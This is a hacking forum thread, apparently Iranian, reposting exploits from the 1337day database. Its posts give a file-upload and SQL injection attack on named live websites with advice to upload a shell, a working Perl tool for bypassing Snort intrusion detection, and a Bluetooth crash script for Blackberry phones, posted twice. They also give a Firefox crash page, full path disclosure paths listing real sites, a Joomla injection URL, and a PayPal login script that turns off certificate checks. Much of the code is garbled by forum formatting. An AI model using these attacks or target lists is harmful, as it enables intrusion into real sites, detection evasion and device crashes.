
Private Exploits In 1337day

شروع موضوع توسط WH!T3 W01F ‏28/1/15 در انجمن Vulnerability Laboratory




  1. WH!T3 W01F
    Digitale Age File Upload / SQL injection vulnerabilities

    Digitale Age File Upload / SQL injection vulnerabilities

    PHP:
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm The Black Devils member from Inj3ct0r Team         1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    # Exploit Title: Digitale Age File Upload vulnerability
    # Date: 
    # Author: The Black Devils
    # Home: 1337day Exploit DataBase 1337day.com
    # Vendor : http://www.digitalage.fr/
    # Category : [ webapps ]
    # Dork:Fabriqué par: Safe & Web Company (((( Digital Age ))))
    # Type : php
    # Tested on: [Windows] & [Ubuntu]
     
     
     
    http://Localost/admin/plugin/file_li...itle=1&bText=0
     
    thn upload your shell using tamber data then you'll find it in these directory 
     
    http://localhost/photo/galerie/0/Cyber.php
     
     
     
    Demo
    http://www.assurances-guillaume.com/admin/
    http://www.millionpereetfils.com/admin
    http://www.vert-eco-materiaux.com/admin
    http://www.la-hyene-jeans.com/admin/
    http://www.dba-demenagement-41.com/admin
    http://www.dp-toiture.com/admin
     
     
    Sql injection
     
    # Dork:inurl:mdm-popup.php?id=
    # Type : php
    # Tested on: [Windows] & [Ubuntu]
     
     
    http://Localhost/mdm-popup.php?id= [sql Injection]
     
    Demo
    http://www.assurances-guillaume.com/mdm-popup.php?id=6'
    http://www.millionpereetfils.com/mdm-popup.php?id=2'
    http://www.vert-eco-materiaux.com/mdm-popup.php?id=2'
    http://www.la-hyene-jeans.com/mdm-popup.php?id=2'
    http://www.dba-demenagement-41.com/mdm-popup.php?id=2'
    http://www.dp-toiture.com/mdm-popup.php?id=5'
     
     
    #------------------
    Greet's To:r0073r & sH3LL05Dz & Dz-CombatanT & all Inj3ctor Team & Arab47.com & is-sec.org Members & 
    Newbie3viLc063s & All The Algerian Hackerz
    #------------------
    Contact:
    https://www.f*ac*ebook.com/DevilsDz
    https://www.f*ac*ebook.com/necesarios
    #------------------
     
    # A666F63EB92782BC   1337day.com [2014-06-15]   D06408D46EE5F331 #
     
  2. WH!T3 W01F
    Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

    Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

    PHP:
    #!/usr/bin/perl 
    use IO::Socket
      
    # By Xianur0 
    [email protected] 
    # http://loscaballeros.mx/ 
    # Snort Multiple HTTP Bypass 
      
    my $bypasscount=0
    die(
    "Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n"unless($ARGV[0]); 
    if(-
    f $ARGV[0] || -d $ARGV[0]){ 
    print 
    "[-] Analyzing Rules...\n\n"
    checkrules($ARGV[0]); 
    } else { 
    tests(); 

      
    sub hdump 
    my $offset 0
    my(@array,$format); 
    foreach 
    my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) { 
    my($len)=length($data); 
    if (
    $len == 16) { 
    @array = 
    unpack('N4'$data); 
    $format="0x%08x (%05d)   %08x %08x %08x %08x   %s\n"
    } else { 
    @array = 
    unpack('C*'$data); 
    $_ sprintf "%2.2x"$_ for @array; 
    push(@array, '  ') while $len++ < 16
    $format="0x%08x (%05d)" 
    "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n"
    }  
    $data =~ tr/\0-\37\177-\377/./; 
    printf $format,$offset,$offset,@array,$data
    $offset += 16


      
    sub snorthexdecode
    my $encoded=$_[0]; 
    while(
    $encoded =~ /\|((\s*([\d\w]{2})\s*)+)\|/) { 
    $cadena="\\|".$1."\\|"
    $remplazo=""
    my @caracteres=($cadena =~ /([\d\w]{2})/g); 
    foreach 
    $caracter (@caracteres) { 
    $remplazo.=chr(hex($caracter)); 

    $encoded=~s/$cadena/$remplazo/g

    return 
    $encoded

    sub analizerules 
    my $pathrules=$_[0]; 
    if(-
    f $pathrules){ 
    open RULE,$pathrules
    while(<
    RULE>) { 
    my $rule=$_
    $rule=~s/[\r\n]+$//g; 
    if($rule=~/http_uri;/ && $rule=~/content:\s*"([^"]+)"/i){ 
    if(snorthexdecode($1)=~/([^"
    ]*\.\w{1,4})(\|3F\||\?)([^"]+)/){ 
    my 
    $bypass=$1."?junk&".$3; 
    print "
    [!] Vuln rule ".$pathrules."".$rule."\n[!] URI Bypass".$bypass."\n\n"; 
    $bypasscount++; 

    } elsif(
    $rule=~/http_header;/ && $rule=~/content:"([^\"]+)"/){ 
    if(
    snorthexdecode($1)=~/^([^\:\s]+\:) (.+)$/){ 
    my $bypass=$1."\t".$2
    print 
    "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n"
    $bypasscount++; 



    elsif(-d $pathrules) { 
    opendir (DIR$pathrules); 
    while(
    readdir DIR) { 
    analizerules($pathrules."/".$_) if($_ !~/^\.+$/); 



    sub checkrules 
    my $checkpath=$_[0]; 
    analizerules($checkpath); 
    print 
    "[-] Bypassed rules: ".$bypasscount."\n"

    sub tests 
    my $host=""
    my $port=80
    my $path=""
    if(
    $ARGV[0]=~/^http:\/\/([^\/]+)(.*)$/){ 
    $host=$1
    $path=$2
    if(
    $host=~/^([^\:]+)\:(\d+)$/){ 
    $host=$1
    $port=$2


    if(
    $host!~/^[^\:]+$/){ 
    die(
    'Invalid URL!'); 

    print 
    "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n"
    if(
    $path !~ "/(.+)"){ 
    die(
    'I need a path...'); 
    $path=$1

    $encodedpath=$path
    $encodedpath=~s/([^\/])/"%" uc(sprintf("%2.2x",ord($1)))/eg
    print 
    "[-] Encoded path: ".$encodedpath."\n"
    @
    orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th"); 
    my $payload="POST / HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "Connection: Keep-Alive\r\n"
    "Host: ".$host.("\r\n"x12). 
    "POST / HTTP/1.1\r\n"
    "Host: ".$host."\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 30".("\r\n"x12). 
    "1234567890"
      
    @
    packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n",""); 
    $packets[1]=$payload.$packets[0]; 
      
    $i=0
    foreach 
    $packet (@packets){ 
    my $sock = new IO::Socket::INET 
    PeerAddr => $host
    PeerPort => $port
    Proto => 'tcp'
    Reuse => 1
    ); 
    die 
    "Could not create socket: $!\n" unless $sock
    print 
    "[-] Seding ".$orders[$i]." test...\n"
    hdump($packet); 
    print 
    $sock $packet
    print 
    "\n[+] Headers:\n"
    my $todo=""
    while(<
    $sock>){ 
    $todo.=$_

    close($sock); 
    hdump($todo); 
    $i++; 

    }  
      
    # 1337day.com [2012-12-12]
     
  3. WH!T3 W01F
    Blackberry OBEX PUSH Crash (Bluetooth) PoC

    PHP:
    #!/usr/bin/python 
     
     
    #Blackberry Bluetooth Crash (OBEX PUSH) 
    # By Xianur0 
    [email protected] 
    # First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel]) 
    # By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc... 
    # ATTENTION: The channel of obex push can vary from blackberry to blackberry 
     
     
    import binascii 
    import serial 
      
    filetosend
    ="/home/xianur0/image.jpg" 
    ****tosend="crashingyou.jpg" 
     
     
    def file
    ****d(string): 
    hexstring "00" 
    for x in string
    hexstring += hex(ord(x))[2:]+"00" 
    return hexstring 
      
    def bin2dec
    (hexstring): 
    hexval "" 
    for a in hexstring
    aux hex(ord(a))[2:] 
    if 
    len(aux) < 2
    aux "0"+aux 
    hexval 
    += aux 
    return int(hexval16
     
     
    def dec2hex
    (dec,largo): 
    retorno hex(dec)[2:] 
    if (
    len(retorno)/2)*!= len(retorno): 
    retorno "0"+retorno 
    if(len(retorno)/largo): 
    for 
    i in range(largo-(len(retorno)/2)): 
    retorno "00"+retorno 
    return retorno 
      
    def enviar
    (filepath,file****): 
    serialrf None 
    print "Loading..." 
    try: 
    serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0 
    except
    return 

    print "Ok!" 
    file**** = file****d(file****) 
    filebinary "" 
    filehandler open(filepath,'rb'
    for 
    linea in filehandler.readlines(): 
    filebinary += linea 
    lengthfile 
    len(filebinary
    print 
    "File Size:",lengthfile 
    sizefragment 
    38 
    while True
    try: 
    print 
    "Sending bytes..." 
    serialrf.write(binascii.unhexlify("80000710001000")) # Inicializamos 
    print "Reading..." 
    status serialrf.read(1
    print 
    hex(ord(status)) 
    if 
    hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10"
    resto serialrf.read(2
    largo bin2dec(resto)-
    if largo 0
    resto serialrf.read(largo
    else: 
    return 

    header 
    "01"+dec2hex((len(file****)/2)+4,2) + file**** + "00c3" dec2hex(len(filebinary),4
    lengthheader = (len(file****)/2)+12 
    fragmento 
    filebinary[0:sizefragment
    envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2)) 
    envio += fragmento 
    serialrf
    .write(envio
    except
    return 

    serialrf
    .close() 
    return 

      
      
    enviar
    (filetosend,****tosend 
      
    # 1337day.com [2012-12-12]
     
  4. WH!T3 W01F
    Mozilla FireFox 17.0.1 Memory Corruption PoC

    Mozilla FireFox 17.0.1 Memory Corruption PoC

    PHP:
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    0     _                   __           __       __                     1 
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0 
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
    1                  \ \____/ >> Exploit database separated by exploit   0 
    0                   \/___/          type (local, remote, DoS, etc.)    1 
    1                                                                      1 
    0  [+] Site            : 1337day.com                                   0 
    1  [+] Support e-mail  : submit[at]1337day.com                         1 
    0                                                                      0 
    1               #########################################              1 
    0               I'm KedAns-Dz member from Inj3ct0r Team                1 
    1               #########################################              0 
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
      
    ### 
    # Title : Mozilla FireFox 17.0 Memory Corruption p0c 
    # Author : KedAns-Dz 
    # E-mail : ked-h (@hotmail.com / @1337day.com) 
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) 
    # *** Site : www.1337day.com .net .org 
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d 
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com 
    # Platform/CatID : local - 0day 
    # Type : Local Exploit - proof of concept 
    # Tested on : Linux SUSE - Enterprise v.11 
    # Download : [http://download.cdn.mozilla.net/pub/mozilla.org/firefox/releases/17.0.1/linux-i686/fr/firefox-17.0.1.tar.bz2] 
    ### 
      
    # <3 <3 Greetings t0 Palestine <3 <3 
    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting 
      
    --> 
      
    <html> 
    <head> 
    <title>Memory Corruption bY KedAns-Dz</title> 
    <**** onload="**********:KedAns();"> 
    <script ********="**********"> 
    function KedAns() 

      
    // (puf) it's just for make a buffer and Crash ! 
    // some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes 
    var puf =unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
      
    ********.write(puf); // Buffer1 
      
    var buffer = '\x41\x42\x43' // ABC buffer 
    for(i=0; i <= 999 ; ++i) 

    buffer+=buffer+buffer 
    ********.write(buffer); // Corrupt this !!! 
      

      
    // [ Memory Corruption !! (*__^) ] 
      
    }  
    </script> 
    </head> 
    </****> 
    </html> 
    <!-- 
      
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== 
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem 
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, 
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) 
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection 
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all 
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD 
    # packetstormsecurity.org * ****sploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits ***s 
    #============================================================================================================ -->  
      
    # 1337day.com [2012-12-12]
     
  5. WH!T3 W01F
    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    PHP:
    The Full Path Disclosure is in vBulletin 4.2.0 (forumrunner). With a Full Path Disclosure you can get the filesystem path of the forum you're in and also (most of the time it is the same) the cPanel username. On the defending side, the leak disappears when PHP's display_errors is turned off on production hosts.
      
    To see it go to

     
     
    http
    ://[path]/forumrunner/include/album.php 
     
     
    It works in 90% of the forums.
     
     
      
    Example

    http://www.mgcproducts.com/forumrunner/include/album.php 
    http://atheistdiscussion.com/forumrunner/include/album.php 
    http://apolyton.net/forumrunner/include/album.php 
    http://www.romaniancommunity.net/forumrunner/include/album.php 
    http://www.ghosthax.com/forumrunner/include/album.php 
    http://www.reddotcity.net/forumrunner/include/album.php 
    http://www.sevenskins.com/forum/forumrunner/include/album.php 
    http://www.purevb.com/forumrunner/include/album.php 
    http://forum.hackersbrasil.com.br/forumrunner/include/album.php  
     
     
    # 1337day.com [2012-12-12]
     
  6. R3DM0V3
    Blackberry OBEX PUSH Crash (Bluetooth) PoC
    PHP:
    //...Leaked bY beBoss..//  
    //......12.12.2012.....// 

    #!/usr/bin/python 
      
    #Blackberry Bluetooth Crash (OBEX PUSH) 
    # By Xianur0 
    [email protected] 
    # First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel]) 
    # By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc... 
    # ATTENTION: The channel of obex push can vary from blackberry to blackberry 
      
    import binascii 
    import serial 
      
    filetosend
    ="/home/xianur0/image.jpg" 
    ****tosend="crashingyou.jpg" 
      
    def file****d(string): 
    hexstring "00" 
    for x in string
    hexstring += hex(ord(x))[2:]+"00" 
    return hexstring 
      
    def bin2dec
    (hexstring): 
    hexval "" 
    for a in hexstring
    aux hex(ord(a))[2:] 
    if 
    len(aux) < 2
    aux "0"+aux 
    hexval 
    += aux 
    return int(hexval16
      
    def dec2hex(dec,largo): 
    retorno hex(dec)[2:] 
    if (
    len(retorno)/2)*!= len(retorno): 
    retorno "0"+retorno 
    if(len(retorno)/largo): 
    for 
    i in range(largo-(len(retorno)/2)): 
    retorno "00"+retorno 
    return retorno 
      
    def enviar
    (filepath,file****): 
    serialrf None 
    print "Loading..." 
    try: 
    serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0 
    except
    return 

    print "Ok!" 
    file**** = file****d(file****) 
    filebinary "" 
    filehandler open(filepath,'rb'
    for 
    linea in filehandler.readlines(): 
    filebinary += linea 
    lengthfile 
    len(filebinary
    print 
    "File Size:",lengthfile 
    sizefragment 
    38 
    while True
    try: 
    print 
    "Sending bytes..." 
    serialrf.write(binascii.unhexlify("80000710001000")) # Inicializamos 
    print "Reading..." 
    status serialrf.read(1
    print 
    hex(ord(status)) 
    if 
    hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10"
    resto serialrf.read(2
    largo bin2dec(resto)-
    if largo 0
    resto serialrf.read(largo
    else: 
    return 

    header 
    "01"+dec2hex((len(file****)/2)+4,2) + file**** + "00c3" dec2hex(len(filebinary),4
    lengthheader = (len(file****)/2)+12 
    fragmento 
    filebinary[0:sizefragment
    envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2)) 
    envio += fragmento 
    serialrf
    .write(envio
    except
    return 

    serialrf
    .close() 
    return 
     
  7. R3DM0V3
    Joomla all v1.5 Error Based SQL Injection Vulnerability
    PHP:
    //...Leaked bY beBoss..//  
    //......12.12.2012.....// 

    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    0     _                   __           __       __                     1 
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
    1                  \ \____/ >> Exploit database separated by exploit   0 
    0                   \/___/          type (local, remote, DoS, etc.)    1 
    1                                                                      1 
    0  [+] Site            : 1337day.com                                   0 
    1  [+] Support e-mail  : submit[at]1337day.com                         1 
    0                                                                      0 
    1               #########################################              1 
    0               I'm Caddy-dz member from Inj3ct0r Team                 1 
    1               #########################################              0 
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
      
    #### 
    # Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability 
    # Author: Caddy-Dz 
    # f*ac*ebook Page: https://www.f*ac*ebook.com/Algerian.Cyber.Army 
    # E-mail: [email protected]  
    # Category:: ***apps 
    # script home : http://joomla.com 
    # Dork : inurl:option=com_user 
    # Security Risk: critical 
    # Tested on: Back|Track 5 KDE / French 
    #### 
    # this was written for educational purpose only. use it at your own risk. 
    # author will be not responsible for any damage caused! user assumes all responsibility  
    # intended for authorized *** application pentesting only! 
      
    // Description : 
      
    the affected component is /com_user/ in all joomla v1.5 
    P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-) 
      
    // Exploit : 
      
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection) 
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection)   [replacing id number by character] 
     
  8. R3DM0V3
    Verified Paypal Email Script
    PHP:
    <?php 
    // email address to check 
    $verifyEmail '[email protected]'

    // your paypal credentials 
    $loginEmail ''
    $password ''

    if (!
    isLogin($loginEmail$password)) { 
    echo 
    'Login failed'
    } else if (
    isVerified($verifyEmail)) { 
    echo 
    'Verified'
    } else { 
    echo 
    'Not verified'



    ######################################### 
    function isVerified($verifyEmail) { 
    $url 'https://www.paypal.com/us/verified/pal='.$verifyEmail
    $response curl_get($url); 
    if(
    strpos($response'<td class="emphasis">Verified</td>')) { 
    return 
    true
    } else { 
    return 
    false



    function 
    isLogin($email$password) { 
    // Get login page  
    $response curl_get('https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run'); 
    $postFields getHiddenFormInputs($response'login_form'); 
    if (!
    $postFields) { 
    return 
    false

    // Post login 
    $postFields['login_email'] = $email
    $postFields['login_password'] = $password
    $postFields serializePostFields($postFields); 
    $response curl_get('https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit'$postFields); 
    if(!
    strpos($response'login_cmd=_login-done')) { 
    return 
    false
    } else { 
    return 
    true



    function 
    curl_get($url$postfields=false) { 
    static 
    $curl
    if(empty(
    $curl)) { 
    $cookiejar 'curl_cookiejar.txt'
    @
    unlink($cookiejar); 
    $curl curl_init(); 
    curl_setopt($curlCURLOPT_COOKIEJAR$cookiejar); 
    curl_setopt($curlCURLOPT_COOKIEFILE$cookiejar); 
    curl_setopt($curlCURLOPT_USERAGENT$_SERVER['HTTP_USER_AGENT']); 
    curl_setopt($curlCURLOPT_RETURNTRANSFER1); 
    curl_setopt($curlCURLOPT_HEADER1); 
    curl_setopt($curlCURLOPT_MAXREDIRS5); 
    curl_setopt($curlCURLOPT_FOLLOWLOCATION1); 

    curl_setopt($curlCURLOPT_URL$url); 
    if(
    stripos($url'https')!==false) { 
    curl_setopt($curlCURLOPT_SSL_VERIFYPEER0); 
    curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);  

    if (
    $postfields) { 
    curl_setopt($curlCURLOPT_POST1);     
    curl_setopt($curlCURLOPT_POSTFIELDS$postfields); 

    $response curl_exec($curl); 
    return 
    $response


    function 
    getHiddenFormInputs($html) { 
    if(!
    preg_match('|<form[^>]+login_form[^>]+>.*</form>|Usi'$html$form)) { 
    return 
    ''

    if(!
    preg_match_all('/<input[^>]+hidden[^>]*>/i'$form[0], $inputs)) { 
    return 
    ''

    $hiddenInputs = array(); 
    foreach(
    $inputs[0] as $input){ 
    if (
    preg_match('|name\s*=\s*[\'"]([^\'"]+)[\'"]|i'$input$name)) { 
    $hiddenInputs[$name[1]] = ''
    if (
    preg_match('|value\s*=\s*[\'"]([^\'"]*)[\'"]|i'$input$value)) { 
    $hiddenInputs[$name[1]] = $value[1]; 



    return 
    $hiddenInputs


    function 
    serializePostFields($postFields) { 
    foreach(
    $postFields as $key => $value) { 
    $value urlencode($value); 
    $postFields[$key] = "$key=$value"

    $postFields implode($postFields'&'); 
    return 
    $postFields



    ?>
     
  9. WH!T3 W01F
    Blackberry OBEX PUSH Crash (Bluetooth) PoC

    اين رو من در يكم بالاتر گذاشته بودم لطفا در گذاشتن اكسپلويت ها دقت كنيد كه در قبل گذاشته نشده باشند.

    موفق باشيد
     
  10. WH!T3 W01F
    Wordpress 3.4.2 Full Path Disclosure Vulnerability

    Wordpress 3.4.2 Full Path Disclosure Vulnerability

    PHP:
    The Full Path Disclosure is in Wordpress <= 3.4.2. With this information you can get the filesystem path of the site you're in and (in most cases) the cPanel username. On the defending side, the leak disappears when PHP's display_errors is turned off on production hosts.
      
    To see it go to
      
    http://[path]/wp-includes/rss-functions.php 
      
      
    Examples
    http://tsmp.us/wp-includes/rss-functions.php 
    http://tafeio.com/wp-includes/rss-functions.php 
    http://santana1540.com.br/wp-includes/rss-functions.php 
      
    It works in 90% of the websites.
      
    # 1337day.com [2012-12-12]
     
  11. WH!T3 W01F
    vBulletin 4.x/5.x multiple Full Path Disclosure Vuln

    vBulletin 4.x/5.x multiple Full Path Disclosure Vuln

    PHP:
    /includes/api/commonwhitelist_2.php 
    /includes/api/commonwhitelist_5.php 
    /includes/api/commonwhitelist_6.php 
    /includes/api/1/album_album.php 
    /includes/api/1/album_editalbum.php 
    /includes/api/1/album_latest.php 
    /includes/api/1/album_overview.php 
    /includes/api/1/album_picture.php 
    /includes/api/1/album_user.php 
    /includes/api/1/announcement_edit.php 
    /includes/api/1/announcement_view.php 
    /includes/api/1/api_cmscategorylist.php 
    /includes/api/1/api_cmssectionlist.php 
    /includes/api/1/api_forumlist.php 
    /includes/api/1/api_getnewtop.php 
    /includes/api/1/api_getsecuritytoken.php 
    /includes/api/1/api_getsessionhash.php 
    /includes/api/1/api_init.php 
    /includes/api/1/api_mobilepublisher.php 
    /includes/api/1/api_usersearch.php 
    /includes/api/1/blog_blog.php 
    /includes/api/1/blog_bloglist.php 
    /includes/api/1/blog_comments.php 
    /includes/api/1/blog_custompage.php 
    /includes/api/1/blog_dosendtofriend.php 
    /includes/api/1/blog_list.php 
    /includes/api/1/blog_members.php 
    /includes/api/1/blog_post_comment.php 
    /includes/api/1/blog_post_editblog.php 
    /includes/api/1/blog_post_editcomment.php 
    /includes/api/1/blog_post_edittrackback.php 
    /includes/api/1/blog_post_newblog.php 
    /includes/api/1/blog_post_postcomment.php 
    /includes/api/1/blog_post_updateblog.php 
    /includes/api/1/blog_sendtofriend.php 
    /includes/api/1/blog_subscription_entrylist.php 
    /includes/api/1/blog_subscription_userlist.php 
    /includes/api/1/blog_usercp_addcat.php 
    /includes/api/1/blog_usercp_editcat.php 
    /includes/api/1/blog_usercp_editoptions.php 
    /includes/api/1/blog_usercp_editprofile.php 
    /includes/api/1/blog_usercp_modifycat.php 
    /includes/api/1/blog_usercp_updateprofile.php 
    /includes/api/1/editpost_editpost.php 
    /includes/api/1/editpost_updatepost.php 
    /includes/api/1/forum.php 
    /includes/api/1/forumdisplay.php 
    /includes/api/1/inlinemod_domergeposts.php 
    /includes/api/1/list.php 
    /includes/api/1/login_lostpw.php 
    /includes/api/1/member.php 
    /includes/api/1/memberlist_search.php 
    /includes/api/1/misc_showattachments.php 
    /includes/api/1/misc_whoposted.php 
    /includes/api/1/newreply_newreply.php 
    /includes/api/1/newreply_postreply.php 
    /includes/api/1/newthread_postthread.php 
    /includes/api/1/newthread_newthread.php 
    /includes/api/1/poll_newpoll.php 
    /includes/api/1/poll_polledit.php 
    /includes/api/1/poll_showresults.php 
    /includes/api/1/private_editfolders.php 
    /includes/api/1/private_insertpm.php 
    /includes/api/1/private_messagelist.php 
    /includes/api/1/private_newpm.php 
    /includes/api/1/private_showpm.php 
    /includes/api/1/private_trackpm.php 
    /includes/api/1/profile_editattachments.php 
    /includes/api/1/profile_editoptions.php 
    /includes/api/1/profile_editprofile.php 
    /includes/api/1/register_addmember.php 
    /includes/api/1/register_checkdate.php 
    /includes/api/1/search_process.php 
    /includes/api/1/search_showresults.php 
    /includes/api/1/showthread.php 
    /includes/api/1/subscription_addsubscription.php 
    /includes/api/1/subscription_editfolders.php 
    /includes/api/1/subscription_viewsubscription.php 
    /includes/api/1/threadtag_managetags.php 
    /includes/api/2/album_picture.php 
    /includes/api/2/api_blogcategorylist.php 
    /includes/api/2/blog_blog.php 
    /includes/api/2/blog_bloglist.php 
    /includes/api/2/blog_list.php 
    /includes/api/2/blog_subscription_entrylist.php 
    /includes/api/2/blog_subscription_userlist.php 
    /includes/api/2/blog_usercp_groups.php 
    /includes/api/2/content.php 
    /includes/api/2/editpost_editpost.php 
    /includes/api/2/forumdisplay.php 
    /includes/api/2/member.php 
    /includes/api/2/newreply_newreply.php 
    /includes/api/2/forum.php 
    /includes/api/2/poll_newpoll.php 
    /includes/api/2/poll_polledit.php 
    /includes/api/2/poll_showresults.php 
    /includes/api/2/private_messagelist.php 
    /includes/api/2/private_trackpm.php 
    /includes/api/2/profile_editattachments.php 
    /includes/api/2/search_showresults.php 
    /includes/api/2/showthread.php 
    /includes/api/3/api_gotonewpost.php 
    /includes/api/4/album_user.php 
    /includes/api/4/api_forumlist.php 
    /includes/api/4/api_getnewtop.php 
    /includes/api/4/breadcrumbs_create.php 
    /includes/api/4/facebook_getforumid.php 
    /includes/api/4/facebook_getnewforummembers.php 
    /includes/api/4/get_vbfromfacebook.php 
    /includes/api/4/login_facebook.php 
    /includes/api/4/newreply_postreply.php 
    /includes/api/4/newthread_postthread.php 
    /includes/api/4/register.php 
    /includes/api/4/register_addmember.php 
    /includes/api/4/search_findusers.php 
    /includes/api/4/subscription_viewsubscription.php 
    /includes/api/5/api_init.php 
    /includes/api/6/api_getnewtop.php 
    /includes/api/6/api_gotonewpost.php 
